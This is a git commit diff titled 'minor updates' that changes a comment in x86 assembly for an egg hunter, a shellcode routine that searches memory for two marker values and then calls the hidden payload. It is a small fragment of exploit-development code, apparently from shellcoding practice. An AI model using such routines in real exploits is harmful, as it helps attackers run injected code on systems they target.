minor updates

master
arno01 11 years ago
parent 05b25b108d
commit eea59770f7

@ -35,12 +35,13 @@ continue:
; Searching for the Egg marker ; Searching for the Egg marker
next: next:
inc eax ; Searching forward inc eax ; Searching forward (can also try dec eax)
isEgg: isEgg:
cmp dword [eax-8], egg1 ; Checking if we can see egg1 cmp dword [eax-8], egg1 ; Checking if we can see egg1
jne next ; If not, continuing to search jne next ; If not, continuing to search
cmp dword [eax-4], egg2 cmp dword [eax-4], egg2
jne next jne next
call eax ; Once found, we call our payload call eax ; Once found, we call our payload
huntersEnd: huntersEnd:

Loading…
Cancel
Save